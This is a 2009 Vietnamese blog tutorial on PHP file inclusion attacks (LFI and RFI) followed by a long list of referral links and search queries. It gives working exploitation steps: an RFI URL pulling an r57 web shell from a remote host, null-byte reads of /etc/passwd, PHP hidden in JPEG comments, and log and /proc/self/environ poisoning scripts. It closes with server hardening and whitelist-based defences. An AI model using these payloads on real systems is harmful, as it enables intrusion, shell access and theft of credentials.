Download nhạc từ các trang nhạc lớn của Việt Nam

20 Tháng Ba 2009
@ 10:14
(Được đăng bởi: Phạm Đức Hải)

Trong vấn đề bảo mật web, kiểu khai thác lỗi File Include là một trong những lỗi nguy hiểm nhất. Lỗi này đã được biết đến từ lâu song hiện nay vẫn cực kỳ phổ biến. Vậy lỗi này như thế nào ? Vì sao bị lỗi ? Cách khai thác và phòng chống ra sao ?

Kiến thức bạn nên trang bị để hiểu bài này sâu hơn:

  • Lập trình PHP

  • Cơ bản về Apache

  • Cơ bản về Linux

Include theo tiếng Việt tạm dịch là bao gồm. Trong lập trình PHP có lệnh là include, require, require _ once, include _ once cho phép file hiện tại gọi đến một file khác.

Tùy thuộc vào mức độ bảo mật của server, kẻ tấn công có thể include file trên chính máy chủ đó (include local) hay include đến một file ở máy khác (include remote). Mục đích của kẻ tấn công là chạy được các hàm hệ thống và thu thập các thông tin nhạy cảm của hệ thống. Tất cả công việc trên kẻ tấn công có thể đạt được khi chạy được web shell (hay còn gọi là web hack tool) như c99shell, r57shell, …

Kẻ tấn công có web shell trong tay sẽ đọc được tất cả các file trong website đang chạy shell đó. Nếu server kém bảo mật thì kẻ tấn công có thể đọc được file của toàn bộ hệ thống, file của các website khác trên cùng máy chủ đó. Lỗi này hay được tấn dụng để tấn công local hack : kiểu tấn công máy chủ, website qua một site bị lỗi trên máy chủ. Nếu có quyền ghi, tất cả các file có thể bị thay đổi: deface trang chủ, chèn mã độc để thu thập thông tin đăng nhập, ẩn dấu backdoor để lần sau vào tiếp,… Kẻ tấn công cũng có thể lấy thông tin truy nhập cơ sở dữ liệu (database) qua file cấu hình của website, sau đó truy nhập vào cơ sở dữ liệu : ăn trộm dữ liệu, xóa, thay đổi dữ liệu,… Trong trường hợp này, cơ sở dữ liệu là MySql cho phép sử dụng hàm loadfile, thì kẻ tấn công có thể tận dụng để đọc file từ hệ thống và file của các site khác qua MySql bằng lệnh LOAD DATA LOCAL INFILE.

Ví dụ đoạn mã PHP include file:

<?php

include("config.php");

?>

Khi khai thác kẻ tấn công có thể include trực tiếp như trên hoặc có thể include một cách mềm dẻo như sau:

 

<?php

include($page);

?>

Khi đó nếu tham số register_globals trong file php.ini được đặt On thì biến $page sẽ là biến toàn cục, có thể gọi đến nó từ bất kì trang nào.

Nếu biến $page được sử dụng như sau: $ _ GET['page'], $ _ POST['page'], $ _ REQUEST['page'] hoặc $_COOKIE['page']

Khi đó $page sẽ có thể được gọi từ trình duyệt để include hoặc đọc file.

Ví dụ đọc file test.html : index.php?page = test.html

Hình 1. Include file từ server khác

 

Hình ảnh dưới đây minh họa việc đọc file boot.ini trên máy chủ windows thông qua biến script.

Hình 2. Include file từ server chủ

 

Các hàm có thể tận dung để khai thác include, require, require _ once, include _ once. Về cơ bản require và include giống nhau, chỉ có một điểm khác là nếu file không tồn tại thì có lỗi fatal-error và script dừng lại,không chạy tiếp.

Cách tìm lỗ hồng file includesion

Có 2 phương pháp để tìm ra lỗi này : kiểm thử hộp đen (Black- Box Testing) và kiểm thử hộp trắng (White-Box Testing).

 

Kiểm thử hộp trắng

Khi bạn có thể xem toàn bộ source code, áp dụng đối với phần mềm của bạn viết, phần mềm mã mở, phần mềm ai nhờ bạn test hộ,… Có thể có các chương trình để quét code hoặc bạn cũng có thể tự viết một đoạn mã làm việc này, thủ công nhất là tự dò bằng các trình soạn thảo thông dụng. Tìm các dòng có cú pháp tương tự như include($page) , điểm lưu ý là biến $page phải chưa được khởi tạo hoặc gán giá trị thì mới có lỗ hổng include file.

Một vài hình ảnh về shell c99, r57 (2 tool phổ biến nhất khi hack web với PHP):

Hình 3 . Hình ảnh hack tool shell c99

Hình 4. Hình ảnh hack tool shell r57

Ở 2 hình trên có thể thấy server chưa có bất kỳ một cấu hình bảo mật nào do đó qua web shell có thể truy nhập đến bất kỳ phần nào của hệ thống, thậm chí chạy được các lệnh hệ thống, hay mở các cổng để truy nhập từ xa vào hệ thống. Ví dụ mở cổng 2009 và telnet từ xa vào.

Hình 5. Công cụ bind port của r57

Hình 6. Kết nối vào sau khi bind port

 

Kiểm thử hộp đen

Kiểm thử hộp đen sử dụng khi bạn không có mã nguồn của mục tiêu, cũng hoàn toàn giống như khi attacker tấn công một hệ thống nào đó, chỉ có thể nhìn từ bên ngoài, đó cũng là lý do vì sao được gọi là hộp đen.

Phương pháp là thử các dữ liệu đầu vào, bất kỳ dữ liệu nào, khi ứng dụng bắn ra lỗi là bạn có thêm thông tin. Để có thể tìm ra lỗi thì có thể kiểm thử bằng công cụ quét, kiểm thử “bằng tay”. Theo kinh nghiệp của tôi, đối với lỗi này các chương trình quét tỏ ra rất kém hiệu quả, với người có kinh nghiệm thì lỗi này đôi khi chỉ cần lướt qua website một vài lần cũng có thể nhận thấy được.

Ví dụ bạn thấy có các link dạng: www.example.com/index.php?page=downloads.html như vậy sẽ rất có khả năng là biến page có lỗi inlcude file, bạn cần thử cụ thể hơn bằng cách đọc thử các file khác.

Hình 6. Đọc file /etc/passwd qua lỗi include

Ví dụ : www.example.com/index.php?page=otherfile.html ,... nếu nhận được lỗi

Warning:

include(otherfile.html) [function.include]: failed to open stream: No such file or directory in /home/site/public_html/ index.php on line x.

Thì có nghĩa là file đó không tồn tại.

Một trong các file có thể dùng để kiểm tra và có thêm thông tin là robots.txt.

Hình 7. Đọc file qua lỗi include

 

 

Tìm lỗi qua các máy tìm kiếm

  • Có thể trực tiếp tìm thông tin về lỗi của mục tiêu qua các trang tìm kiếm hay qua các trang thông báo lỗi như http://www.milw0rm.com nếu đã biết tên phần mềm trang web mục tiêu dùng.

Hình 8. Trang milw0rm.com



  • Dùng Google CodeSearch

Cú pháp : lang:php (include|require)(_once)?\s*['"(]?\s*\$_(GET|POST|COOKIE)

Hình 9. Tìm lỗi qua Google Code Search

Null-Byte

Trong một số trường hợp include được dùng như sau:

include($page.".html");

Khi đó chỉ các file .html mới được include, vậy làm sao để đọc được file khác?

Null-byte sẽ cho phép đọc file khác bằng cách thêm null byte vào cuối file cần đọc.

Đọc file /etc/passwd

index.php?page =/ etc/passwd%00

Khi đó include("/etc/passwd.html"); trở thành include("/etc/ passwd");

Tuy nhiên không phải lúc nào nul-bite cũng có tác dụng, tùy thuộc webserver, code,…



Khai thác lỗ hổng (Exploiting)

Khi phát hiện ra lỗi làm sao có thể khai thác được? Phần trên phần nào bạn cũng đã nhận thấy một số cách khai thác. Về cơ bản có hai kiểu khai thác là inclde file từ máy chủ khác (RFI – Remote file include), include file từ chính máy chủ lỗi (LFI – Local file include).

Remote file include (RFI)

Khi bị lỗi này tức là tham số register_globals=On, với lỗi này người không cần có nhiều kiến thức về lập trình cũng dễ dàng khai thác được thông tin. Kẻ tấn công chỉ cần đặt file web hack tool trên một máy chủ nào đó (thường là host miễn phí) và include qua lỗi.

http://lab.vnsecurity.vn/index.php?page=http://remote.vnsecurity.vn/r57.txt

File được include vào là file r57.txt từ host remote.vnsecurity.vn. Kết quả tham khảo hình 1.

Local file include (LFI)

Nếu tham số allow_url_fopen trong file php.ini đặt là Off thì sẽ không thể thực hiện include file từ máy chủ khác. Khi đó chỉ khai thác được dạng include trên cùng máy chủ, cũng tùy cấu hình server an toàn hay không mà attacker có thể đọc được file ngoài thư mục của website có lỗi. Khi đó để có thể khai thác tốt cần có một web shell trên máy chủ, làm sao để có được web shell? Có thể có nhiều cách nhưng đòi hỏi người khai thác phải có kinh nghiệm và hiểu biết về PHP, apache, Linux. (Trên Windows cũng tương tự nhưng có một số điểm khác, tôi không trình bày ở tài liệu này).

Một trong các điểm quan trọng trong khai thác LFI là đọc các file nhạy cảm của hệ thống, website. Một số file quan trong đối với hệ điều hành Linux /etc/passwd, /etc/group, httpd.conf,…

File /etc/passwd chứa thông tin về tài khoản của hệ điều hành. Attacker có thể lấy tên tài khoản và đùng hình thức dò quét mật khẩu, thường là Brute force (dân lập trình thường gọi là duyệt trâu big grin). Nếu mật khẩu không được shadowed, thì password được mã hóa sẽ nằm luôn trong file /etc/passwd, có được file này attacker có thể có được mật khẩu bằng cách crack (dùng John the Ripper chẳng hạn). Còn nếu không mật khẩu mã hóa nằm trong /etc/shadow (có thể ở thư mục khác đối với các bản Linux và Unix).

Ví dụ cú pháp trong shadow :

guru:$1$OiD7e.JO$AGoOmlOsUK1XBw2qJcx4z0:14286:0:99999:7:::

File httpd.conf là file cấu hình của webserver Apache, fiel này chứa rất nhiều thông tin về hệ thống. Thông tin quan trọng đối với việc khai thác là error_log, access_log, DocumentRoot,…

Một số file quan trọng của website như .htaccess , file cấu hình chứa mật khẩu của database (thường là config.inc, configuration.php,…)

LFI cũng được dùng kết hợp với lỗi upload để có được web shell. Nếu lỗi upload file có thể up được trực tiếp web shell lên và chạy được thì không cần dùng đến LFI. Nhưng nếu có lỗi upload, chỉ upload được các file ảnh,… thì có thể tận dụng LFI. Việc cần làm là định vị ví trí file ảnh nhiệm vụ này khó hay không tùy thuộc kinh nghiệm tường người big grin.

Trong việc upload ảnh lên cũng có rất nhiều kiểu tùy thuộc code của chương trình upload. Nếu chỉ lọc đuôi file thì đơn giản bạn chỉ cần đổi tên web shell từ .php sang đuôi của ảnh .jpg chẳng hạn. Nếu chương trình upload kiểm tra xem có đúng là ảnh không thì làm sao để chèn code PHP vào file ảnh ? Phần dưới tôi sẽ nói về chèn code vào file ảnh mà vẫn là file ảnh thực sự.

Hình 10. Include code PHP từ file ảnh

Ẩn code PHP và cách dấu shell

Có nhiều chỗ có thể ẩn code PHP như trong chính file PHP, file log, file ảnh hay bất kỳ file gì.

Chèn PHP vào ảnh

Như ở trên tôi đã nói chèn code PHP vào ảnh để làm gì ? Ở đây chèn code PHP vào file ảnh mà file ảnh đó vẫn là một file ảnh thực sự. Vậy chèn code PHP vào phần nào của ảnh ? Ta sẽ thêm code PHP vào phần comment của ảnh, tuy nhiêm phần này không chứa được nhiều code php, nếu shell quá lớn sẽ không được, do đó phần này thường chèn đoạn mã ngắn như shell command, upload form,…

Có 2 chương trình phổ biến để chèn code PHP vào ảnh là :

+ edjpgcom.exe dùng cho Windows

Download : http://guru.net.vn/content/binary/edjpgcom.zip

Hình 11. Giao diện edjpgcom


Hình 12. File ảnh sau khi đã thêm code PHP, không có gì thay đổi

Hình 13. Kết quả include file ảnh có chứa code upload

+ jhead cho Linux và Windows

Download : http://freshmeat.net/projects/jhead/

Hình 14. Hình ảnh jhead


Hình 15. Chạy hàm hệ thống qua code chèn trong ảnh

Code PHP trong logfil

Mỗi một website khi chạy, toàn bộ thông tin truy cập, lỗi,… sẽ được máy chủ lưu lại. Log truy cập thông thông thường được gọi là log truy cập của site. Ngoài ra có lỗi khác đối với webserver được lưu trong file access_log, error_log (tên file này là mặc định, có thể đổi tên khác trong httpd.conf).

Ví dụ minh họa dưới đây cho thấy việc chèn code /<?php echo phpinfo();?> vào file log.

Tạo 1 file fopen.php như sau:

<?php

$res = '';

$fp = fsockopen('127.0.0.1', 80);

if(!$fp){

echo "No connection";

}

fputs($fp, "GET /<?php echo phpinfo();?> HTTP/1.1\r\n");

fputs($fp, "Host: 127.0.0.1\r\n\r\n");

while(!feof($fp)){

$res .= fgets($fp, 128);

include($_GET['page'].".php");

}

echo $res;

?>


Hình 16. Tạo request lỗi

Hình 17. File log ghi nhận lỗi có chứa mã PHP



Hình 18. Include file log


Code PHP trong file text

Trong một vài trường hợp một số phần của website lưu dữ liệu ra file text ví dụ như maillist, blogroll,..

Thường thì phần này sẽ lưu thông tin người dùng thông thường có thể thêm vào. Khi đó có thể chèn code PHP vào các file này. Việc còn lại là định vị file này. Để làm được điều đó cần quan tâm đến một số file như .htacces, file config của site,…

Ví dụ đoạn code lỗi:

<?php

echo '<form method="POST">';

echo 'E-Mail Address';

echo '<input name="email">';

echo '<input type="submit" name="submit">';

echo '</form>';

if(isset($_POST['submit'])){

$data = $_POST['email'];

$fp = fopen("data.txt","a+");

$wr = fwrite($fp,$data);

fclose($fp);

}

?>

File dữ liệu là file data.txt, có thể tận dụng file này để khai thác.


Kết hợp file include và SQL Injection

Với một số phần mềm hiện nay, hay có thêm phần module phát hiện những tấn công thông dụng như SQL injection. Ví dụ với CMS PHP-Nuke có đoạn code như sau :

<?

$REQ = print_r($_REQUEST,true);

$ip = 'IP: '.$_SERVER['REMOTE_ADDR'];

$time = 'Date: '.date("d.m.y - H:i:s");

$ref = 'Referer: '.$_SERVER['HTTP_REFERER'];

$browser = 'Browser: '.$_SERVER['HTTP_USER_AGENT'];

if(eregi('UNION',$REQ) && eregi('SELECT',$REQ)){

$fp = fopen("attacks.txt","a+");

fwrite($fp,"$REQ\n $ip\n $time\n $browser\n $ref\n");

fclose($fp);

header('Location: http://www.google.com');

}

?>

Khi đó các request từ trình duyệt có từ UNION và SELECT thì sẽ ghi lại toàn bộ URL request,.. vào file attacks.txt.

Như vậy có thể chèn mã PHP vào file đó như sau:

http://www.example.com/index.php?id= UNION SELECT <?php echo phpinfo(); ?>


Code PHP trong /proc

/proc là một thư mục cho phép giao tiếp giữa nhân hệ điều hành (kernel) với với người dùng của hệ điều hành (user). Tất cả các file trong /proc không có trên đĩa cứng nó tồn tại trong RAM.

Trong phần này có thể lợi dụng để chèn code qua Referer, phần code này sẽ được lưu trong file nằm trong thư mục có tên trùng với process ID Apache đang chạy site đó. Tìm được file này cũng có thể include được.

Code minh họa:

<?php

$res = '';

$fp = fsockopen('www.lab.vnsecurity.com', 80);

if(!$fp){

echo "hi!.";

}

fputs($fp, "GET /index.php?page=/proc/self/environ HTTP/1.1\r\n");

fputs($fp, "Referer: <?php echo phpinfo(); ?>\r\n");

fputs($fp, "Host: www.lab.vnsecurity.com\r\n\r\n");

while(!feof($fp)){

$res .= fgets($fp, 128);

}

echo $res;

?>

Cách chống tấn công File Inclusion

Quan phần trên bạn đã có thể hình dung lỗi như thế nào, tấn công ra sao? Vậy làm gì để chống lại các tấn công inlude file?

Về cơ bản có 2 việc phải làm:

  • Server an toàn

  • Lập trình an toàn (cái này rất quan trọng vì code có thể triển khai ở nhiều server)

Server an toàn

Để có một server an toàn không hề đơn giản nó đòi hỏi bạn phải hiểu về các cái mình cài đặt và có kinh nghiệm về bảo mật cũng như quản trị. Phần này tôi chỉ nói các phần liên quan đến file include thôi.

  • Trong php.ini đặt các tham số allow_url_fopen=Off (allow_url_fopen=Off) , register_globals=Off, Safe_mode=On, display_error=Off

  • Đặt quyền cho các thư mục hợp lý

Lập trình an toàn

  • Bắt lỗi chặt chẽ

  • Bất cứ biến nào cũng cần khởi tạo

  • Sử dụng đường dẫn tuyệt đối

Một ví dụ code chặt chẽ:

<?php

$whitelist = array('index.html', 'downloads.html', 'info.html');

$page = $_GET['page'];

if(in_array($page,$whitelist)){

include($page);

}else{

die("Attack attempt");

}

?>

Cuối cùng, chúc bạn có hiểu biết về file include và có phát hiện và ngăn chặn các tấn công kiểu này.

Goodluck!

Tham khảo : hakin9, http://www.milw0rm.com/papers/232 , http://www.owasp.org


Tác giả:

Phạm Đức Hải

http://guru.net.vn

Also post : VnSecurity.vn Tấn công File Inclusion (File Inclusion Attacks)

Ý kiến [3] - Chuyên mục: Bảo mật | Hack | Linux | PHP

Referred by:
http://www.netvibes.com/ [Referral]
http://mp3fanta.com/ [Referral]
Tấn công File Inclusion (File Inclusion Attacks) (www.google.com.vn) [Referral]
LFI+How to upload shell (www.google.com.vn) [Referral]
code tao tieu de co web (blogsearch.google.com.vn) [Referral]
2252 (huiqn.info) [Referral]
http://360.yahoo.com/profile-feFY7wYzeqWo7eFd2N6ZUZNO.3Akqkl... [Referral]
cách khai thác dữ liệu từ các shell (www.google.com) [Referral]
http://uk.360.yahoo.com/profile-cBdhmF0_erB5nh6z73nrb6w-?cq=... [Referral]
doc cac file .config (www.google.com.vn) [Referral]
http://mp3amor.com/ [Referral]
http://mp3corsa.com/ [Referral]
index.php?page =/ etc/passwd%00 (www.google.com.vn) [Referral]
lỗi remote include file trên hệ thống web server (www.google.com.vn) [Referral]
http://mp3toipod.com/ [Referral]
webshell download (www.google.co.kr) [Referral]
LlyKil (www.google.com.vn) [Referral]
Local file include environ (www.google.com.vn) [Referral]
tool dò shell (www.google.com.vn) [Referral]
http://mp3fountain.com/ [Referral]
6395 (vnbrain.net) [Referral]
LFI windows server boot.ini (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?t=833&page=2 [Referral]
6404 (vnbrain.net) [Referral]
code upload file anh vao co so du lieu mysql (www.google.com.vn) [Referral]
http://altmusicnews.co.cc/ [Referral]
http://audioindustrynews.co.cc/ [Referral]
http://audionewsagency.co.cc/ [Referral]
http://audionewsweb.co.cc/ [Referral]
http://audioreviewonline.co.cc/ [Referral]
http://digitalaudioreview.co.cc/ [Referral]
http://eaudionews.co.cc/ [Referral]
http://globalmusicnews.co.cc/ [Referral]
http://intermusicnews.co.cc/ [Referral]
http://musicanalysissite.co.cc/ [Referral]
http://musicnetworknews.co.cc/ [Referral]
http://vnbrain.net/forum/showthread.php?s=ecc2683b87198d8f14... [Referral]
http://musicnewsfirst.co.cc/ [Referral]
http://musicreportonline.co.cc/ [Referral]
http://tunereviewonline.co.cc/ [Referral]
http://ultramusicreview.co.cc/ [Referral]
http://webaudioreport.co.cc/ [Referral]
http://yourreviewcenter.co.cc/ [Referral]
http://vnbrain.net/forum/showthread.php?s=10f99234bb22a5aaa4... [Referral]
http://delicious.com/Armenschron [Referral]
http://laptrinh.aohaiday.com/2009/03/tan-cong-file-inclusion... [Referral]
http://vnbrain.net/forum/showthread.php?t=833&highlight=shel... [Referral]
viet thu cho cac chu bo doi o xa (www.google.com.vn) [Referral]
các lệnh require once (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?s=4c284a0de7747fac8c... [Referral]
http://vnbrain.net/forum/showthread.php?s=d955d67af5364e66bb... [Referral]
chèn shell vào comment jpg (www.google.com.vn) [Referral]
tan cong thong qua file config (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?s=f574015a3961ff0266... [Referral]
http://vnbrain.net/forum/showthread.php?s=e3e436410b22f3a94b... [Referral]
làm sao để tấn công đoạn code của 1 trang blog (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?s=acf1add38d2d86c846... [Referral]
kiểm thử phần mềm "kiểm thử hộp đen" (www.google.com.vn) [Referral]
"phòng chống Remote include file" (www.google.com.vn) [Referral]
6476 (vnbrain.net) [Referral]
6396 (vnbrain.net) [Referral]
http://vnbrain.net/forum/showthread.php?s=ea4e267a718e0434e9... [Referral]
Local file inclusion hack (www.google.com.vn) [Referral]
huiqn vn (search.live.com) [Referral]
Chèn shell vào file ảnh (www.google.com.vn) [Referral]
chen shell r57 vao anh (www.google.com.vn) [Referral]
http://74.125.19.132/translate_c?hl=en&sl=vi&u=http://www.gu... [Referral]
http://vnbrain.net/forum/showthread.php?s=42ae9bd7d3a58f2eda... [Referral]
code tấn công submit (www.google.com.vn) [Referral]
jhead (www.google.com.vn) [Referral]
huiqn.info (search.yahoo.com) [Referral]
http com (www.google.com.vn) [Referral]
config php ini chay ham fopen() (www.google.com.vn) [Referral]
file inclusion (www.google.com.vn) [Referral]
fail remote include file web server (www.google.com.vn) [Referral]
hinhanh (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?t=833&highlight=shel... [Referral]
Uploading shell by using LFI (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?s=a4389a0572735f8bd1... [Referral]
http://vnbrain.net/forum/showthread.php?t=833&highlight=shel... [Referral]
php file inclusion (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?s=0000cb993c3cfc90fe... [Referral]
http://vnbrain.net/forum/showthread.php?s=7aac794b7f270941d4... [Referral]
PHP File Inclusion (www.google.com.vn) [Referral]
"file shell"+"hack" (www.google.com.vn) [Referral]
Remote Local File Inclusion (www.google.com.vn) [Referral]
remote file inclusion (www.google.com.vn) [Referral]
"tấn công * shell" (www.google.com) [Referral]
huiqn (www.google.com.vn) [Referral]
những trang web bị lỗi file inclusion (www.google.com.vn) [Referral]
tấn công shell (www.google.com) [Referral]
chống remote file trên php (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?s=7137d011fa42001eb2... [Referral]
chen php qua file anh (www.google.com.vn) [Referral]
các phương pháp chống local attack (www.google.com.vn) [Referral]
edjpgcom hack (www.google.cn) [Referral]
he ve vui qua (www.google.com.vn) [Referral]
Remote File Inclusion Attack (www.google.com.vn) [Referral]
File inclusion (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?s=d1dac00f114ef06601... [Referral]
http://209.85.129.132/translate_c?hl=en&ie=UTF-8&sl=vi&tl=en... [Referral]
http://vnbrain.net/forum/showthread.php?t=833 [Referral]
http://vnbrain.net/forum/showthread.php?s=ba55d302a1b933367f... [Referral]
attack shell r57 (www.google.com.vn) [Referral]
tool tan cong MySQL (www.google.com.vn) [Referral]
File Inclusion Attacks (www.google.com.vn) [Referral]
Local file inclusion (www.google.com.vn) [Referral]
"viet thu cho cac chu bo doi" (www.google.com.vn) [Referral]
phan mem chen shell vao file anh (www.google.com.vn) [Referral]
lam sao co the tan cong 1 log (www.google.com.vn) [Referral]
include shell html file (www.google.com.vn) [Referral]
huiqn vn (www.google.com) [Referral]
http://vnbrain.net/forum/showthread.php?s=dfc48b3e7990ca932e... [Referral]
r57 shell txt (www.google.com.vn) [Referral]
Cách local attack = shell (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?s=2cfca7c3cfa1ae685b... [Referral]
file inclusion (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?t=833&highlight=ch%C... [Referral]
http://mp3laguna.com/ [Referral]
Remote file inclusion (www.google.com.vn) [Referral]
PHAN MEM shell c99 (www.google.com.vn) [Referral]
tấn công lfi (www.google.com.vn) [Referral]
remote include file (www.google.com.vn) [Referral]
Remote file inclusion (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?s=70dc1778a9d66ddb65... [Referral]
method attack local by up shell (www.google.com.vn) [Referral]
http://www.bobiasg.com/index.php/2009/02/lich-su-ong-gia-noe... [Referral]
r57shell (www.google.com.vn) [Referral]
related vnsecurity.com (www.google.com.vn) [Referral]
local file inclusion (www.google.com.vn) [Referral]
Remote File Inclusion (www.google.com.vn) [Referral]
hack upload file .txt shell (www.google.com.vn) [Referral]
bai hat " he ve vui qua " (www.google.com) [Referral]
shell r57.txt (www.google.com.vn) [Referral]
local file inclusion remote (www.google.com.vn) [Referral]
File Inclusion Attacks (www.google.com.vn) [Referral]
http://mp3actu.co.cc/ [Referral]
Phát hiện tấn công trong log file (www.google.com.vn) [Referral]
vnbrain cách includes shell vào file index.php (www.google.com.vn) [Referral]
r57 (www.google.com.vn) [Referral]
lab cach tan cong SQL injection (www.google.com.vn) [Referral]
http://mp3cted.co.cc/ [Referral]
cách tấn công local attack (www.google.com.vn) [Referral]
hack huiqn.info (www.google.com.vn) [Referral]
shell r57.txt (www.google.com.vn) [Referral]
chen shell vao file anh (www.google.com.vn) [Referral]
chen shell vao file anh (www.google.com.vn) [Referral]
tấn công local (www.google.com.vn) [Referral]
tan cong mysql (www.google.com.vn) [Referral]
khi attack du lieu khong chay duoc (www.google.com.vn) [Referral]
attack co so du lieu trong sql server 2000 (www.google.com.vn) [Referral]
Tấn công File Inclusion (File Inclusion Attacks) (www.google.com.vn) [Referral]
lam banh (www.google.com.vn) [Referral]
tấn công shell (www.google.com.vn) [Referral]
cách dùng edjpgcom (www.google.com.vn) [Referral]
r57 làm sao zip source (www.google.com.vn) [Referral]
remote include file trên hệ thống web server (www.google.com.vn) [Referral]
khai thac loi inclusion (www.google.com.vn) [Referral]
File Inclusion (www.google.com.vn) [Referral]
remote file inclusion attack (www.google.com.vn) [Referral]
phòng chống R57Shell (www.google.com) [Referral]
Tấn công File Inclusion (File Inclusion Attacks) (www.google.com.vn) [Referral]
phim ser co giao thao (www.google.com.vn) [Referral]
phan mem kiem tra blogs tu xa (www.google.com.vn) [Referral]
tấn công bằng shell script (www.bing.com) [Referral]
shell command upload (www.google.com.vn) [Referral]
download shell c99.txt (www.google.com.vn) [Referral]
c99shell php attack (www.google.com.vn) [Referral]
file attack nghia la file gi (vn.search.yahoo.com) [Referral]
shell (www.google.com.vn) [Referral]
phương pháp include shell SQL Injection (www.google.com.vn) [Referral]
chống chạy shell tren IIS (www.google.com.vn) [Referral]
tim hieu Remote file inclusion (www.google.com.vn) [Referral]
"Cách local attack = shell" (www.google.com.vn) [Referral]
http://laptrinh.aohaiday.com/2009/06/tan-cong-file-inclusion... [Referral]
http://vnbrain.net/forum/showthread.php?t=833&highlight=ch%C... [Referral]
r57shell download (www.google.com.vn) [Referral]
http://www.ask.com/web?o=10590&l=dis&gct=&gc=&q=74.125.19.13... [Referral]
cách local attack shell (www.google.com.vn) [Referral]
search shell trên google.com (www.google.com.vn) [Referral]
nhung shell vao anh (www.google.com.vn) [Referral]
khai thác shell c99 (www.google.com.vn) [Referral]
up shell qua sql injection (www.google.com.vn) [Referral]
dow shell c99 .JPG (www.google.com.vn) [Referral]
local file inclusion (www.google.com.vn) [Referral]
site Demo PHP Remote File Inclusion (www.google.com.vn) [Referral]
khai thac php inclution (www.google.com.vn) [Referral]
"cach tan cong sql (www.google.com.vn) [Referral]
file inclusion (www.google.com.vn) [Referral]
Remote File Inclusion (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?t=833&highlight=shel... [Referral]
chồng shell trên IIS (www.google.com.vn) [Referral]
cach dung shell r57 (www.google.com.vn) [Referral]
cac lenh su dung shell R57 (www.google.com.vn) [Referral]
lenh command linux shell R57 (www.google.com.vn) [Referral]
Using c99 and r57 (www.google.com.vn) [Referral]
PHP File Inclusion (www.google.com.vn) [Referral]
aspx shell jpg không chạy (www.google.com.vn) [Referral]
cách dùng shell R57 (www.google.com.vn) [Referral]
sử dụng shell R57 (www.google.com.vn) [Referral]
EDJPGCOM para ubuntu (www.google.cl) [Referral]
server khong doc duoc file exe (vn.yhs.search.yahoo.com) [Referral]
chèn shell vào hình vnbrain.net (www.google.com.vn) [Referral]
safe mode: /r57shell (www.bing.com) [Referral]
Remote shell Url vnbrain (www.google.com.vn) [Referral]
cu phap tim kiem bing.com (www.bing.com) [Referral]
lay data tu C99Shell (www.google.com.vn) [Referral]
cach xem accesslog de biet ai local attack (www.google.com.vn) [Referral]
lỗi inclusion (www.google.com.vn) [Referral]
download shellr57 (www.google.com.vn) [Referral]
download shell c99 (www.google.com.vn) [Referral]
"shell sql" download (www.google.com.vn) [Referral]
cách dùng edjpgcom (www.google.com.vn) [Referral]
code shell Local Attack images (www.google.com.vn) [Referral]
local/remote file inclusion overview (www.google.com.vn) [Referral]
robots.txt dùng để làm gì vnbrain.net (www.google.com.vn) [Referral]
dung R57 de log Ip (www.google.com.vn) [Referral]
Remote File Inclusion (www.google.com.vn) [Referral]
may 6881 co phan mem media nhung khong chay dc (www.google.com.vn) [Referral]
Cach su dung Shell c99 (www.google.com) [Referral]
download shell r57 (www.google.com.vn) [Referral]
chống xem file php "ajax" "REFERER" (www.google.com.vn) [Referral]
cache:3JzZR2SugjAJ:www.guru.net.vn/PermaLink,guid,fcb5c280-baf5-4c87-a9d5-bebff329bb59.aspx www.ma nguon.com/vn (74.125.153.132) [Referral]
download shell c99 bypass safe mode (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php?t=833&highlight=s%E1... [Referral]
an shell tren sever de lan sau attack (www.google.com.vn) [Referral]
cach dau shell tren sever de lan sau attack (www.google.com.vn) [Referral]
tan cong local attack (www.google.com.vn) [Referral]
"download shell *.txt" (www.google.com) [Referral]
hack tool shell aspx (www.google.com.vn) [Referral]
remote file inclusion + guru blog (www.google.com.vn) [Referral]
include shell vao database vnbrain (www.google.com.vn) [Referral]
PHIM HONG KONG (www.google.com.vn) [Referral]
sử dụng shell c99 (www.google.com) [Referral]
phimser hong cong (www.google.com.vn) [Referral]
file attack. có nghĩa là gì? (www.google.com.vn) [Referral]
vnbrain.net config.php (www.google.com.vn) [Referral]
vnbrain up shell len host (www.google.com.vn) [Referral]
attack shell (www.google.com.vn) [Referral]
http://www.icio.de/user/rpirilman [Referral]
cách dùng edjpgcom.exe (www.google.com.vn) [Referral]
includes shell vào sql (www.google.com.vn) [Referral]
r57.txt la gi (www.google.com.vn) [Referral]
dow shell c99 (www.google.com.vn) [Referral]
lỗi load google (www.bing.com) [Referral]
Cách local attack = shell (www.google.com.vn) [Referral]
connect từ xa vào database bằng shell (www.google.com.vn) [Referral]
co giao thao (www.google.com.vn) [Referral]
phimser.2009 (www.google.com.vn) [Referral]
File Inclusion Attacks (www.google.com.vn) [Referral]
phuong phap phong chong local attack (www.google.com.vn) [Referral]
shell guru vn (www.google.com.vn) [Referral]
shell connect SQL aspx (www.google.com.vn) [Referral]
php file inclusion remote exec (www.google.com.vn) [Referral]
shell c99.jpg (www.google.com.vn) [Referral]
Sql inject full vnbrain (www.google.com) [Referral]
lệnh mysql site: vnbrain.net (www.google.com.vn) [Referral]
hack qua attack file (www.google.com.vn) [Referral]
r57shell donwload (www.google.com.vn) [Referral]
cấu hình httpd.conf chống local attack (www.google.com.vn) [Referral]
includes shell vao images guru's (www.google.com.vn) [Referral]
command attack hack from ubuntu (www.google.com.vn) [Referral]
phimser.com (www.google.com) [Referral]
lam sao upload shell (www.bing.com) [Referral]
Remote File Inclusion (www.google.com.vn) [Referral]
tấn công Inclution Site (www.google.com.vn) [Referral]
download webshell local (www.google.com.vn) [Referral]
cách local attack shell (www.google.com.vn) [Referral]
file inclusion hack (www.google.com.vn) [Referral]
cach dung c99 tan cong database (www.google.com.vn) [Referral]
download c99.php ma hoa (www.google.com.vn) [Referral]
